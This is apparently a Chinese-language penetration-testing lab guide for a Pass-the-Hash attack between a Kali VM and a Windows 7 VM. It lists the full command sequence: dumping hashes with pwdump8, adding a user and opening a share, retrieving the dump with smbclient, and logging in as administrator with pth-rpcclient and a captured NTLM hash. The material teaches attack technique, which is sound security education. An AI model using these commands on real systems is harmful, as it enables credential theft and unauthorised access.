实验简介
本实验旨在通过模拟网络环境中的一次典型的Pass-the-Hash(PtH)攻击,帮助学生理解Windows系统中用户身份验证机制的弱点以及如何利用哈希值进行横向渗透。实验将使用pwdump8工具从目标主机提取用户密码哈希,并通过SMB协议共享文件传输至攻击机,最后使用pth-rpcclient工具完成基于哈希的身份验证绕过攻击。
技能增长
通过本次实验的学习,能掌握添加用户、设置权限、共享目录配置等Windows基本操作,了解pth攻击的工作原理并实践攻击过程。
预备知识
pass-the-hash攻击原理
Pass-the-Hash(PtH)攻击是一种利用Windows系统中存储的用户密码哈希值代替明文密码进行身份验证的攻击方式,攻击者通过获取目标账户的NTLM哈希后,无需破解密码即可模拟该用户访问网络资源并实现权限提升或横向移动,常见于渗透测试和恶意攻击中,防范措施包括限制管理员权限、启用LAPS、强化身份验证机制等。
文件共享服务
文件共享服务是指通过网络让不同计算机之间能够互相访问和传输文件的技术或平台。这种服务允许用户在不同的设备间轻松交换数据,无论这些设备是位于同一个局域网内还是通过互联网连接。文件共享服务可以通过多种协议和技术实现,如SMB/CIFS、NFS、FTP、HTTP等。
实验环境
主机名:kali 用户名/密码:root/随机
IP地址:192.168.0.3
主机名:Windows7
用户名/密码:administrator/123456
IP地址:192.168.0.4
实验操作
进入Windows7虚拟机,打开桌面pwdump8文件夹,路径栏输入cmd并回车,在当前目录启用命令终端。
执行pwdump8.exe>C:\Users\Administrator\Desktop\pwdump8\result.txt命令将密码的哈希值导出到pwdump8目录中
然后执行net user share 123456 /add命令添加share用户用于文件共享服务
右键pwdump8文件夹,点击属性,选择共享菜单,然后点击高级共享按钮
勾选贡献此文件夹,共享名为pwdump8,然后点击权限按钮,添加share用户
选中share用户并勾选所有允许列表的权限,最后点击应用
权限成功设置好后,点击确定按钮
点击安全菜单,并点击编辑按钮
点击添加按钮,添加share用户并勾选所有允许列表的权限,最后点击确定
切换到kali虚拟机,执行smbclient //192.168.0.4/pwdump8 -U share --option="client max protocol=SMB3"命令通过连接主机192.168.0.4的共享文件夹pwdump8
执行dir命令查看文件列表,然后执行get result.txt /result.txt命令将result.txt文件下载到根目录下
新建命令终端,执行cat /result.txt命令查看文件内容,将administrator管理员用户密码的哈希值AAD3B435B51404EEAAD3B435B51404EE:32ED87BDB5FDC5E9CBA88547376818D4复制(注意:每次生成的哈希值是不一样的)
执行pth-rpcclient -U 'administrator%AAD3B435B51404EEAAD3B435B51404EE:32ED87BDB5FDC5E9CBA88547376818D4' //192.168.0.4命令通过administrator用户的哈希对192.168.0.4进行pass-the-hash攻击,并获取该主机的访问权限
下面开始将对目标进行信息收集,执行srvinfo命令查看主机的基本信息,发现系统当前用户uid为500,系统版本为6.1
执行queryuser administrator命令查看administrator用户详细信息,如:登录时间、注销时间、密码修改时间、UID等
特别声明:
此文章仅供参考,如用作非法交易造成一定损失或触犯法律,作者一概不负!!!!! 请勿用于非法途径,仅供参考。传送门 -----------> 《中华人民共和国网络安全法》